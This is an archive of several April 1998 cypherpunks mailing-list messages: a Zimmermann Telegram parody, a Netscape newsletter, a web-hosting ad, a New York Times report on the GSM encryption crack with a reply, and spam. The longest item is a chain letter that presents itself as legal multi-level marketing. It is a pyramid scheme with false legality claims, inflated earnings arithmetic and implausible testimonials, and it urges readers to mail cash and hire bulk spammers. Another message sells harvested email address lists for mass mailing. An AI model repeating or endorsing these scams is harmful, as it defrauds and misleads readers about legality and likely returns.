===================================================

This update sponsored by: HUGHES NETWORK SYSTEMS

http://www.hns.com/
Hughes Network Systems is one of the fastest-growing digital
communications companies in the world, providing world-class
wireless, satellite and broadcast products to customers in over 60 
countries.
Today, HNS employs over 500 software engineers and 200 hardware
engineers dedicated to developing our products, services and 
systems from our Germantown, Maryland headquarters and San 
Diego, California facility. Click above to learn more.

http://www.joinhns.com
HNS HOT JOBS CAREER INVITATIONAL. On Saturday, April 25, 
Hughes Network Systems (HNS) is hosting a Hot Jobs Career 
Invitational at our facility in Gaithersburg, Maryland (metro 
Washington, DC). For this 1-day event, we're bringing in the best the 

industry has to offer to meet with our Hiring Managers. Interview 
expenses will be paid for qualified candidates.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip Zimmermann <prz@pgp.com>
Date: Mon, 13 Apr 1998 21:30:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Amusing takeoff of Zimmermann Telegram
Message-ID: <v03007801b158948637ee@[204.179.136.185]>
MIME-Version: 1.0
Content-Type: text/plain


I thought this was a pretty funny takeoff of the famous Zimmermann 
Telegram.  Apparently this was already sent to the cypherpunks list,
but I just thought that since it made me laugh out loud, maybe I could
laugh out loud on the list.  :-D   --prz

>Date: Mon, 13 Apr 1998 15:03:22 -0600
>From: The Arthur <ta@dev.null>
>Reply-To: ta@dev.null
>MIME-Version: 1.0
>To: cypherpunks@toad.com
>CC: Alexander Szek <as@dev.null>, Nigel de Gray <ndg@dev.null>,
>        Reverend William Mongomery <rwm@dev.null>
>Subject: Pretty Lousy Privacy PasSword--'cyherpunks' / Norman encryption
>
>***
>*** PGP Signature Status: not verified (signing key missing)
>*** Signer: 0x53F2F291
>*** Signed: N/A at N/A
>*** Verified: 4/13/98 at 21:20
>***
>
>Bienfait to Toad:
>
>
Most private for PRZ's personal information and to be handed to the
>
>
Eternal Iminister in (?) England with...by a pretty private route.
>
>

>
>
  We propose to begin on the 19 April an unrestricted subliminal 
>
>
InfoWar fair. 
>
>
  We shall endeavour, in spite of this, to keep MeatSpace neutral.
>
>
In the event of this not succeeding we shall make Austin a proposal
>
>
of alliance on the following basis; make InfoWar together, smoke the
>
>
peace piple together, generous bandwidth support, and an understanding
>
>
that Austin is to reconquer their lost territory in Freedom, Liberty
>
>
and Privacy. The settlement in detail is left to you.
>
>

>
>
  You will inform the Webmaster, that is Webmaster Choate of Austin, 
>
>
of the above most privately as soon as the outbreak of war with
>
>
MeatSpace is certain, and add the suggestion that he should on his
>
>
own initiative invite 2600 to immediate adherence and at the same
>
>
time mediate between 2600 and ourselves.
>
>
  Please call the WebMaster's attention to the fact that the ruthless
>
>
employment of our sublimarines offers the prospect of compelling
>
>
BeaverSpace to peace.
>
>

>
>
Acknowledge receipt with two-word reply...
>
>

>
>
The Arthur
>
>

>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: john.sabiz1@JEDI.juno.com
Date: Mon, 13 Apr 1998 21:34:21 -0700 (PDT)
To: .LSIR@toad.com
Subject: $ THIS REALLY WORKS !!! -AFOI
Message-ID: <199804140434.VAA23122@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/html



This is it !
DO YOU WONDER IF SOME OF THESE THINGS WORK??
You see it again and again because it WORKS!!  See the message at the bottom!
     This is the letter you've been reading about in the news lately.  Due to the popularity of this letter on the internet, a major nightly news program recently devoted an entire show to the  investigation of the program described below  to see if it really can make people money.  If you saw it, you know that their conclusion was that, while most people did not make the $50,000 discussed in the plan, most people were able to double and triple their money at the very least, in a short amount of time.  The show also investigated whether or not the program was legal.  Their findings proved once and for all that there are absolutely no laws prohibiting the participation in the program.  This has helped to show people that this is a simple, harmless and fun way to make some extra money at home.  This is for real.
        The result of this show has been truly remarkable.  So many people are participating that those involved are doing much better than ever before.  Since everyone makes more as more people try it out, its been very exciting to be a part of lately.  You will understand once you experience it.
         You may have thought this is a chain letter or a pyramid scheme (it's not).  You may have thought this is illegal  (it's not).  You may have just decided its not worth your time  (it is).   Whatever the reason you decided not to try it in the past, I ask you to reconsider.
        After reading the simple instructions below, you will be ready to start.   I think that once you begin to see your first orders in the mail, you will be surprised to learn just how many people are participating in this program.   I have been involved in the program for a long time but I have never seen so many people trying this out as I have recently.   This is good news because the more people that do it, the more everyone benefits.  If you ever thought of giving this a shot, now's the time to do it.  
        There's very little to lose, but alot to gain.  Besides making alittle extra cash each week, its fun to wonder how much money will be in your mailbox each day.  I wish all of you could know the feeling I get each day after work as I go to my p.o. box.  Its exhilerating!
        Just read over the letter below.  It will make starting a breeze.  Hope to hear from you soon.
                                        
                                                                                                     Jenny C.   Grand Junction, CO
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
	      My advice to you is that you save this letter (or print it) for a time.  The idea is very simple, but it definitely takes a few times reading it over before it sinks in.   I am confident that if you read over this letter briefly once now, and once again whenever you get the chance,  you will begin to see the potential involved.
	      Most people do not respond to this letter immediately.  Take as much time as you need to let the idea fly around in your head alittle.
	      This is not a pyramid scheme.   Many people equate this program with illegal schemes that involve nothing but the transferring of cash.  The difference between a legitimate multi-level marketing program and a pyramid scheme is that in a pyramid, there is no money being exchanged for a legitimate product.  The law states this clearly.  Anyone who claims this program is illegal is misinformed in the area of retail law.
	
	      In this program, the product is a  financial report that you can simply e-mail to someone  after they order it from you and send cash to you through the mail.   While the report can be sent easily to yout customers with the click of one button through e-mail, it is nonetheless a legitamate product which people choose to send you $5.00 to purchase from you.
  
	     The other legal issue that most people ask about in programs such as this one  is the issue of tax legality.  The law is clear that all income must be reported to the government each year.  When customers send you cash, it is your responsibility to keep track of how much you are making and report this at the end of the year.
          
	    
          Following is a simple explanation of the system and simple instructions for you to follow to get started right away: 
1)	you save this letter onto your computer in case you need it later
2)	you send $5.00 to each of the 4 people listed below to order a report
3)	each of those 4 people will e-mail you 1 report immediately 
4)	you save these 4 reports onto your computer
5)	you go back to this original letter and move everyone's name down 1 level, removing the  person in the 4th position and putting your name and address in the 1st position
6)	you have this newly altered letter e-mailed to tens of thousands of people  (usually people pay a bulk e-mailer to do this for them to start)
7)	when people receive this letter you sent them, they will see your name and address as the 1st report slot and will send you a $5.00 order for it
8) when people order these reports, from you, you immediately e-mail it  to them (they will give you their e-mail address along with their $5.00)
          Thats it folks......its that simple......the $5 is yours!
	      You e-mail them the report by "copying" it out of the saved e-mail report you received from the person on the list in this letter, and "pasting" it into a new e-mail letter and sending it off....no problem.   After you get the hang of it, you can copy many letters into new e-mails very fast and send off many orders quickly.
	      The reason it works is that everyone involved has an incentive to help everyone else succeed.  The people you order the reports from will e-mail the reports to you immediately because they will profit when you profit.
          Each of the 4 people you order from also will be eager to answer any questions you may have and help you in any way they can so that you can start mailing copies of this letter out with their names on it along with yours.
	        I mentioned above that success in this system can be guaranteed based on simple statistical facts.   When you send out tens of thousands of advertisements (or pay someone to mail them out for you), you can be absolutely positively assured that a certain percentage will respond and send you $5.00 for the report.  The next fact is that the larger the mailing you have sent out, the more responses you will get.   
          Please understand this about this program:  It only takes an extremely small percentage of people to respond to your ad in order for you to make a profit.   This is because your advertisement (with your address or P.O. box on it) will be sent to such incredibly large amounts of people.  (A bulk e-mailer can send your letter out to thousands of people per hour.)  
              
		OVERVIEW OF OUR  ELECTRONIC MULTI-LEVEL MARKETING PROGRAM:
	    Basically, this is what we do:  We sell thousands of people a product for $5.00 that costs us next to nothing to produce and e-mail.  As with all multi-level businesses, we build  our business by recruiting new partners and selling our products.  Every state in the U.S. allows you to recruit new multi- level business online (with your computer).
        Look at multi-million companies such as New Vision (a vitamin supplier).  We use the exact same method of multi-level selling they use.  The only difference is that our product is a financial report you can easily e-mail to someone, rather than costly vitamins.
	    The product in this program is a series of four businesses and financial reports.  Each $5.00 order you receive by regular  mail will include the e-mail address of the sender.  To fill each order, you simply e-mail the product to the buyer.  THAT'S IT!...the $5.00 is yours!   It really is THAT simple!   Think about it...........
FOLLOW THE INSTRUCTIONS EXACTLY
The profits are worth it.  
So go for it.  Remember the 4 points and we'll see you at the top.
				******* I  N  S  T  R  U  C  T  I  O  N  S *******
This is what you must do:
1................  Save this letter onto your computer
2................Order all 4 reports listed and numbered from the list below.
               (For each report send $5.00 and your e-mail address on a piece of paper to each person listed.  When you order, make sure you  print your e-mail address clearly, and also be sure to request each SPECIFIC report.  You will need all four reports, because you will be saving them onto your computer and reselling them.)
      (You will receive the reports a few days later by e-mail.  Save them onto your computer)
3................  Now you have 4 financial reports saved on your computer.  These are  legitimate products that people will want to buy.  You are ready to start advertising  your product to tens of thousands  of potential customers. 
4................  Take this letter and move everyone's name and address down 1 position.  The person in the 4th position gets erased.  Put your own name (make up a company name) and address (could be a home or PO box) in position 1.
 
          At this point you have 2 options.  If you decide you want to advertise yourself, you need to obtain mailing lists and send this newly altered letter to as many people as you can to get people to order the report from you for $5.
         This method can be time consuming and costly. 
         The second option is to pay a bulk e-mailer to mail out your letter for you.  They can send out your letter to tens of thousands of people for a fraction of the cost of the above method. This is the method we recommend and is by far the simplest and cheapest way to go.
 
         When you use a bulk e-mailer, all you need to do is give them a copy of the original letter with the address you want your $5 orders to go to and they will do the rest.   If you are able to find a bulk e-mailer who is already involved with the program, they won't even need the original letter since they will already have it.
        There are many bulk e-mailers out there who will send out your letter for you.  You can find them by doing a search of the word "bulk e-mailer" on the internet.   There are many excellent companies out there who will mail for you, but you still must be alittle wary.  We have found that some companies don't send them out in a productive manner (w/out using fresh addresses or attaching other messages to yours)  and since there is no sure way to know exactly their methods, you're left wondering.  
	
	    The best of all scenarios is to have someone who is also involved in this program mail out your letters for you.  There are many private bulk e-mailers out there who send out this very letter with their names on the list because they know the potential involved.  There is a good chance that one of the people you will be ordering your report from will be able to bulk e-mail out your letter for you.
       When you order the report from the people on the list in this letter, they will e-mail you a report---if they bulk e-mail, they will probably include an offer to send your letters out for you. 
	  There is a simple reason why it is best to have someone involved in the program bulk e-mail out your letters for you.  As mentioned before, it is difficult to verify that a company is sending out your letter in the most profitable way.  If the person sending out the letter is also involved in the program, they will understand the program and, best of all, they will do everything possible to see you get as many responses as possible because when you profit they will profit as well since they are on the list as well.  This gives the person an incentive to take great care in sending out your mail since they have alot to gain from it as well as you.  Other bulk e-mailing companies will not have this same incentive.
You can get 1,000,000 email addresses and a lot more to help you get started for only $19.95.   Write down this Order Number:   30031 and  phone number:  1-888-225-4093.  Call toll free for a lifetime membership (you will not be sorry!, this is a great investment) REALLY. 

ALWAYS PROVIDE SAME-DAY SERVICE ON ALL ORDERS!!!
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
REQUIRED REPORTS
***Order each REPORT by NUMBER and NAME***
          Following is the list of people you will send $5 to:
         (Remember to include your e-mail address on the paper concealing the 5 dollars)
         When they e-mail the report to you, save them onto your computer.
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
REPORT #1 
		"HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES"
ORDER REPORT #1 FROM:
C Enterprise
1741 Morninglo Ln
Columbia, SC  29223
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
REPORT #2
		"MAJOR CORPORATIONS AND MULTI-LEVEL SALES"
ORDER REPORT #2 FROM:
BFC
11 Shadow Grey Ct.
Columbia, SC 29223
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
REPORT #3 
		"SOURCES FOR THE BEST MAILING LISTS"
ORDER REPORT #3 FROM:
E. Baker
81 Pondfield Rd. #263
Bronxville, NY 10708
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
REPORT #4 
		"EVALUATING MULTI-LEVEL SALES PLANS"
ORDER REPORT #4 From:
Scotty Group, Ltd
460-A South Commerce Ave
Front Royal, Va 22630
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Here's the fun part:
                     Take a look at what is called the "multiplier effect" in marketing:
	      Let's say you decide to start small just to see how it goes.  Assume you advertise your letter until 10 people respond and send you $5.00.  Also assume that those 10 people also advertise until they get 10 people to order and send them $5.00.  	
	Assume this continues for everyone in your downline and observe the following results:
* 	10 people order report #1 from you and send you $5.00
				5  * 10 =  $50
*	 each of those 10 people advertise until 10 people order report #1 from them (since their mailing will have your name 	as #2, 100 people will also send you $5 each to order report #2)
				5  *  100=  $500
*	 each of those 500 people advertise until 10 people order report #1 from them (1000 people order report #3 from you 	and send you $5)
				5  *  1000=  $5,000   
*	 each of those 1000 people advertise until 10 people order report #1 from them
	(10,000 people order report #4 from you and send you $5)
				5  *  10,000=  $50,000
                            
				$50,000  +  $5,000  +  $500  +  $50   
	Total =  $55,550
       
        A bulk e-mailer can send your letter out to thousands of people in one night.  The above scenario holds true if only 10 people out of those thousands respond.  This program is a study in statistics.  A certain percentage WILL respond and send you $5.
*****T  E  S  T  I  M  O  N  I  A  L  S*******
This program does work, but you must follow it EXACTLY! Especially the rule
of not trying to place your name in a different position, it won't work and you'll
lose a lot of potential income. I'm living proof that it works. It really is a great
opportunity to make relatively easy money, with little cost to you.  If you do
choose to participate, follow the program exactly, and you'll be on your way
to financial security.
			Sean McLaughlin, Jackson, MS
My name is Frank. My wife, Doris, and I live in Bel-Air, MD. I am a cost
accountant with a major U.S. Corporation and I make pretty good money.
When I received the program I grumbled to Doris about receiving "junk mail." I
made fun of the whole thing, spouting my knowledge of the population and
percentages involved.  I "knew" it wouldn't work. Doris totally ignored my
supposed intelligence and jumped in with both feet. I made merciless fun
of her, and was ready to lay the old "I told you so" on her when the thing didn't
work... well, the laugh was on me!  Within two weeks she had received over 50
responses. Within 45 days she had received over $147,200 in $5 bills! I was
shocked!  I was sure that I had it all figured and that it wouldn't work.  I AM a
believer now. I have joined Doris in her "hobby."   I did have seven more
years until retirement, but I think of the "rat race" and it's not for me. We owe
it all to MLM.
			Frank T., Bel-Air, MD
I just want to pass along my best wishes and encouragement to you.  Any
doubts you have will vanish when your first orders come in. I even checked
with the U.S. Post Office to verify that the plan was legal. It definitely is! IT
WORKS!!!
			Paul Johnson, Raleigh, NC
The main reason for this letter is to convince you that this system is honest,
lawful, extremely profitable, and is a way to get a large amount of money in a
short time. I was approached several times before I checked this out. I joined
just to see what one could expect in return for the minimal effort and money
required. To my astonishment, I received $36,470.00 in the first 14 weeks,
with money still coming in.
Sincerely yours, Phillip A. Brown, Esq.
Not being the gambling type, it took me several weeks to make up my mind to
participate in this plan. But conservative that I am, I decided that the initial
investment was so little that there was just no way that I wouldn't get enough
orders to at least get my money back. Boy, was I surprised when I found my
medium-size post office box crammed with orders!  For awhile, it got so
overloaded that I had to start picking up my mail at the window. I'll make more
money this year than any 10 years of my life before. The nice thing about this
deal is that it doesn't matter where in the U.S. the people live. There simply
isn't a better investment with a faster return.
			Mary Rockland, Lansing, MI
I had received this program before. I deleted it, but later I wondered if I
shouldn't have given it a try. Of course, I had no idea who to contact to get
another copy, so I had to wait until I was e-mailed another program...11
months passed then it came...I didn't delete this one!...I made more than
$41,000 on the first try!!
			D. Wilburn, Muncie, IN
This is my third time to participate in this plan. We have quit our jobs, and will
soon buy a home on the beach and live off the interest on our money.  The
only way on earth that this plan will work for you is if you do it. For your sake,
and for your family's sake don't pass up this golden opportunity.  Good luck
and happy spending!
			Charles Fairchild, Spokane, WA
ORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR ROAD TO
FINANCIAL FREEDOM!!!
       There is no guarante that you will make $50,000 each time, but its nice just to have some help with the rent or to have a few bills taken care of each month.  This program is fun to be a part of. We hope to hear from you soon!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: netcenter-news@netscape.com
Date: Tue, 14 Apr 1998 00:02:00 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Netcenter News - April Special Edition
Message-ID: <199804140701.AAA09972@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


  
 

Title: Netscape Netcenter News - New Service Announcement


















































WE
NEED
YOUR
MIND


Professional Connections is a new Netcenter online community that allows professionals and industry insiders to come together to discuss trends in online business, debate issues in digital culture, and mix and network with one another. 

Coupled with Member Directory, your Netcenter membership is your ticket to network directly with the best minds of the interactive world. Sign up now, and join us in Professional Connections.


























GET
CONNECTED
WITH 
NETCENTER
MEMBER
DIRECTORY 





Trying to find a business colleague's email address? Looking for a way to share your home page URL with your friends?  Look no further than Netcenter's new Member Directory. An online directory of Netcenter members, Member Directory lets you 

Search for colleagues and friends
Network with other Netcenter members

You can also use Member Directory to learn more about the participants in Netcenter Professional Connections discussion forums. Or, post your home page URL or online rsum for potential employers to see. With Member Directory, you can build your own World Wide Network. 

To access Member Directory, simply fill out a member profile. You can edit your profile at any time.  And 
you control what information is made available for other members to see. 

Coming Soon - Shortly you will be able to search for other members based on occupation or interest areas.  So, whether you're looking for career leads or for other entrepreneurs with whom to discuss small-business issues, take advantage of  Member Directory today.




Netscape respects your online time and Internet privacy. If you would prefer not to receive future issues, click here to to send an unsubscribe email or reply to this message with the word unsubscribe in the subject line.




Copyright (c) 1998. Netscape Communications Corporation. All rights reserved.

























From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cyber Media" <sales@cybermedia-inc.com>
Date: Wed, 15 Apr 1998 04:54:24 -0700 (PDT)
To: sales@cybermedia-inc.com
Subject: Special Web Hosting Offer
Message-ID: <199804141755.NAA29862@ns2.cybermedia-inc.com>
MIME-Version: 1.0
Content-Type: text/plain


-------------------------------------------------------------------
  Information available at http://www.cybermedia-inc.com/special/

               Questions Call Toll Free (888) 260-6333
-------------------------------------------------------------------

        Our Best Web Hosting Special Yet - You Be the Judge
        Special Offer Expires - April 24, 1998 at 11:59pm PST

        To Order
        http://www.cybermedia-inc.com/special/order/

****************************************************

      Special Offer for Web Hosting Owners

We at Cyber Media offer you what you may currently be missing from
your current web hosting company.  Things such as being able to get a
live human on the phone if you need help, or having all the services
you need to be successful (Shopping cart, secure server, etc).

We are emailing you because you have a web site and we are having our
best web hosting special ever.  April is slow for many service related
companies, we are no exception, so the only way we can get a lot of
new customers in April is to have a special that is so good that
nobody in their right mind could pass it up. 

And that is what we are trying to do.  We are hoping to offer you so
much that you can not possibly reject our offer and feel good about
doing so.

We have one of the most powerful web hosting services on the Internet.

* 100 Megabytes of storage space
* Front Page Extensions
* True virtual hosting (http://www.yourcompany.com/)
  Every customer has their own IP Address which means your
  web site will work with ALL browsers and not just the latest
  ones!
* 30 Email POP Accounts (Included FREE)
* Unlimited Email Aliases
* Unlimited Autoresponders
* Secure Server (Other sites charge for this, TOTALLY free with us
  and EASY to use too!)
* Shopping Cart Secure Online Ordering (Great for Catalogs!)
* Plug n Play CGI Scripts (Counters, Guestbooks, Form Scripts, 
  Discussion boards, and many more)
* Use your OWN CGI Scripts!
* Anonymous FTP sites
* FTP and Telnet Access
* Real Audio, Real Video, Vivo, Quicktime, True Speach and much more!
* Only 150 Customers per Web Server! Some of our competitors place
  250 to 500 customers on one server and it SLOWS everyone down.
* Best of all - 24 Hour Phone and Email Support!

All of the above plus more for only $40 per month. NO SETUP FEE!

Want to save more?

SPECIAL BONUS OFFER

Our yearly web hosting price is only $300 which breaks down to only
$25 per month! (Same price many of our competitors are selling their
ENTRY LEVEL accounts at!)  And for the first time ever, for those who
sign up yearly we are including a 200 Site Web Promotion (A $150 Value
Absolutely FREE!) See http://www.promotenow.com/ for more details.

And like always, everything we offer comes with a 30 Day 100% Money
Back Guarantee.  If you are not happy with our services, for whatever
reason, we will refund 100% of your money, every penny.

If you are still not convinced, we are doing something we have NEVER
done before and probably will never do again.  If you sign up for the
year, at only $300, we will give you an extra month ABSOLUTELY FREE! 
(This breaks down to just $23 per month!)

If you haven't made up your mind yet, or are skeptical, please
give us a call.  You can virtually always reach a human on the
other end, and if not we always return calls within the hour.  (Even
on most weekends!)  Call us toll free at (888) 260-6333 to discuss
your needs and find out how we can definately help you reach your
goals.

Sincerely,


Chris Donnell
President of Cyber Media
(888) 260-6333

P.S. As a Double Bonus Offer my gift to everyone who orders for the
year is an extra month FREE.  Remember, this offer is good only until
April 24, 1998 at 11:59 PM EST.

To order, just call us or go to our web page at

http://www.cybermedia-inc.com/special/order/

Secure Ordering at
https://www.secureforms.net/~cybermedia/special/order/


-------------------------------------------------------------------
Testimonials

"Just wanted to thank you for all your help in getting the Lincoln
Center for the Performing Arts web site up and running.  Cyber Media
has been prompt - handling all calls and e-mails within 24 hours, and
going above and beyond the call of duty to be sure everything was
working properly. The staff has been extremely courteous, knowledgable
and professional.  We look forward to a mutually and prosperous
business relationship!"

Lincoln Center for the Performing Arts
http://www.classicalmusiclibrary.com/
New York city


"Since I've been with Cyber Media, I have gone from playing with
the Internet with inadequate tools, to actually working with the
proper tools provided by Cyber Media (Shopping cart, autoresponders,
email addresses, and faster servers).  I have also noticed that the
speed of their servers is much faster and the quality of the support
improved immensely.  I used to be with Webcom and could never reach
anyone on the phone, and rarely had my calls returned.  I was raised
in an era where customer support was important, it is to me, and you
are the first company I've worked with on the Internet who has not
only met my expectations but totally surpassed them!  Thank you
again."

Kendall Berry - kwberry@bootheel.net
http://www.bootheel.com/
573-737-2493


"I have been with Cyber Media for the last 3 years and they have
always been there when I've had a question, and have quickly resolved
any problems that I have had.  I constantly recommend them to my
customers and would be happy to talk to anyone who is skeptical.  Give
me a call at 912-475-4682."

Marc Sylvester - marc@laughingbird.com
http://www.laughingbird.com
912-475-4682




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 14 Apr 1998 05:41:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NYT on GSM Hack
Message-ID: <199804141241.IAA21656@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, April 14, 1998, pp. D1, D5.

   Researchers Crack Code In Cell Phones 

      Weakened Encryption Raises Security Concern 

   By John Markoff

   San Francisco, April 13 -- In successfully cracking a
   widely used encryption method designed to prevent the
   cloning of digital cellular phones, a group of University
   of California computer researchers believe they have
   stumbled across evidence that the system was deliberately
   weakened to permit Government surveillance.

   The method that was cracked is known as G.S.M., for the
   Groupe Speciale Mobile standard. The world's most widely
   used encryption system for cellular phones, G.S.M. is
   employed in about 80 million of the devices worldwide and
   by as many as two million phones in the United States.

   Most of the 58 million American analog and digital cell
   phones are based on a variety of other methods, but 20
   American cellular phone companies, including Pacific Bell,
   a unit of SBC Communications Inc., and the Omnipoint
   Corporation, use the G.S.M. standard.

   Two researchers at the University of California at Berkeley
   announced today that they had successfully broken the
   G.S.M. method by using a computer to determine a secret
   identity number stored in the Subscriber Identity Module,
   or S.I.M., a credit card-like device inside the phone.

   If criminals were to crack the method, they could "clone"
   phones protected by G.S.M. encryption -- that is, detect a
   phone's number and use it in another phone to fraudulently
   bill calls. However, both the researchers and cellular
   telephone company officials said today that the cloning
   threat was extremely remote compared with the vulnerability
   of analog cellular phones.

   For one thing, they said, cracking G.S.M. had required
   almost 10 hours of electronic probing and high-powered
   computing.

   What was even more intriguing than the security threat,
   however, was that cracking the code yielded a tantalizing
   hint that a digital key used by G.S.M. may have been
   intentionally weakened during the design process to permit
   Government agencies to eavesdrop on cellular telephone
   conversations.

   Although the key, known as A5, is a 64-bit encryption
   system -- generally an extremely difficult code to crack --
   the researchers determined that the last 10 digits were
   actually zeros. That means that with the powerful computers
   available to national intelligence agencies, it would be
   possible to decode a voice conversation relatively quickly,
   said Marc Briceno, director of the Smartcard Developers
   Association, a small programmers organization.

   "It appears the key was intentionally weakened," he said.
   "I can't think of any other reason for what they did."

   For years, the computer industry has been rife with rumors
   about encryption designers having been persuaded or forced
   by Government spy agencies to mathematically weaken
   communications security systems or to install secret
   backdoors. Some of the rumors even have the National
   Security Agency or the Central Intelligence Agency posing
   as cryptographers, designing the encryption programs
   themselves and then releasing them -- all to insure that
   they could decode data or phone conversations.

   Such rumors are fed, in part, by the hazy origins of the
   G.S.M. system. Industry cryptographic experts said that the
   underlying mathematical formulas, or algorithms, in
   G.S.M.'s encryption design were thought to have originated
   in either Germany or France as part of the creation of the
   standard in 1986 and 1987.

   But other than today's hint of an intentionally weakened
   system, little evidence has ever emerged to support
   speculation, and the researchers' suspicions were not
   universally endorsed.

   "It's possible there are other reasons for doing this,"
   Stewart Baker, a Washington lawyer who was formerly a
   lawyer for the National Security Agency, said. The N.S.A.

   is one of the agencies most often suspected of such schemes
   because a major part of its mission is to intercept
   telephone calls.

   "Speculation is easy, and it never dies," Mr. Baker said.

   Even so, most industry experts could think of no good
   reason why an encryption algorithm key would be
   intentionally shortened, other than to facilitate
   surveillance.

   "This was deliberately weakened," said Phil Karn, an
   engineer at Qualcomm Inc., a cellular telephone
   manufacturer that has developed an alternative standard to
   G.S.M. "Who do you think would be interested in doing
   something like this?"

   The weakened key was discovered by two researchers, Ian
   Goldberg and David Wagner, both members of the University
   of California at Berkeley's Internet Security Applications,
   Authentication and Cryptography Group, with the aid of Mr.
   Briceno. They stressed that they had easily detected the
   security flaw that could make digital cellular phones
   vulnerable to cloning.

   Cloning has been a costly fraud problem for.many years. But
   digital phones are widely believed to be immune from
   cloning. In San Francisco, Pacific Bell's billboard
   advertisements depict a sheep and a cell phone and boast
   that of the two only the cell phone cannot be cloned.

   Cellular telephone industry executives acknowledged the
   flaw in G.S.M. but said it actually reinforced their claims
   about the security of digital telephones.

   "My hat goes off to these guys they did some great work,"
   said George Schmitt, president of Omnipoint. "I'll give
   them credit, but we're not at any risk of fraud."

   The researchers and the Smartcard Developers Association
   said that the successful attack was new evidence of the
   shortcomings of a widespread industry practice of keeping
   security techniques hidden from public review. Real
   security, they argue, requires publication of the
   algorithms so that independent experts can verify the
   strength of the systems.

   "This shows yet again a failure of a closed design
   process," Mr. Briceno said. "These companies pride
   themselves on their security, but now the chickens are
   coming home to roost."

   [End]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 14 Apr 1998 06:52:08 -0700 (PDT)
To: John Young <cypherpunks@toad.com
Subject: Re: NYT on GSM Hack
In-Reply-To: <199804141241.IAA21656@dewdrop2.mindspring.com>
Message-ID: <199804141352.JAA25802@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>   researchers believe they have
>   stumbled across evidence that the system was deliberately
>   weakened to permit Government surveillance.

I seem to recall that it was officially announced when the current GSM standard was released that it had been weakened at the request of European governments.  

Is this an example of anti-government advertising and promotion?  Counting on the fact that no one will recall that we already knew this.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: maildirect@mailcity.com
Date: Tue, 14 Apr 1998 10:52:18 -0700 (PDT)
To: maildirect@mailcity.com
Subject: Free Email Software!
Message-ID: <033471451170e48UPIMSRGSMTP02@email.msn.com>
MIME-Version: 1.0
Content-Type: text/plain


//////////////////////////////////////////////////////////////////////////
                         Advertising  Secrets  Exposed !
Are you having a difficult time trying to promote your business on the Internet?
Have you posted classified ads with little or no response?

Well, if you'd like to know something that you could use with your present
business to make it Explode!

I have the answer to your business growth problems. Free Email Software!

Everybody's talking about Email Marketing!
A gold mine for those who can take advantage of mass Email Marketing.

Just imagine for a minute what this will mean to your business, being able to
reach thousands of new prospects daily, with no cost to you.

We will give you a new software package called Freedom, absolutely Free, to
use in your business.

Now you will have, a do it yourself method of online advertising, that up till now
only the professional Internet Marketer had access to. And have a powerful
potential to target millions with simple click of your mouse.

And if you need fresh Email addresses, we have them on, 3.5 IBM disk. The
best prices on the Internet.

100,000 Addresses Oppty Seekers Only $29.95 Includes shipping and handling.
200,000 Addresses Oppty Seekers Only $39.95 Includes shipping and handling.
400,000 Addresses Oppty Seekers Only $49.95 Includes shipping and handling.

And for the serious Internet Marketer, 25 million plus!! Our company has one of
the largests databases on the Internet with over 25 million Email Addresses,
these are split up in many different categories, and rotated frequently, giving
you new addresses to choose from each time. This service allows you to access
our database of Email Addresses as much as you want, from our website. All
for only $195. No need to ever gather or purchase Email addresses again!!
But because of our special internet promotion for the month of April30/98
you can purchase our E-Mail software program including 25 Million E-Mail
addresses, and including full time tech support, telephone number, for only
$95. for all orders received before April30/98


PRINT AND FILL OUT ORDER FORM BELOW
 
Yes! Please Rush Me Fresh Email Addresses, And My FREE Email Software.

Name______________________________________________________

Address____________________________________________________

City_________________________________State__________________
 
Zip____________________________Email________________________

Types Of Addresses Opportunity Seekers (   )  General  (   )

100,000 Addresses $29.95 Includes shipping&handling and Freedom Software.
200,000 Addresses $39.95 Includes shipping&handling and Freedom Software.
400,000 Addresses $49.95 Includes shipping$handling and Freedom Software.

25Million Addresses$95 From database Includes S&H and Freedom Software.
And full time tech support, by telephone, for all orders received by April30/98

Freedom Software Only. Send $10. To cover S&H. IBM 3.5 Floppy disk.

Bonus: Orders received before, April30/98 will receive another Software program
Free, called "CHECKER" that allows you to receive checks by Fax, Email, and Phone.
Sold over the Internet for $129. Free with your purchase of any or the above products!
Never lose another impulse sale again, for lack of, a credit card, or the slowness
of US mail.

Also "FREE Lifetime 5 Page Commercial Web Site with Free Autoresponder and lifetime
E-mail address. No adult material allowed.

FREE report The 10 best homebased Online business, Creating and Selling on Line!

FREE report Internet Profits and Search Engines Secrets!


 
Payment: Check (  )  Money Order (  )  Cashier's CK (  )  Other (  )  U.S Funds 

Send Order Form Along With Payment: To
   
                                            REV TECH MARKETING
                                              2172 Kanoy ave
                                        Thomasville N.C 27360-8733
                                                   U.S.A.
                                                
                                                        

               
      
Mail End.






 
                
 











                                                       
  

 

 









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sex                                      @aol.com
Date: Tue, 14 Apr 1998 11:23:33 -0700 (PDT)
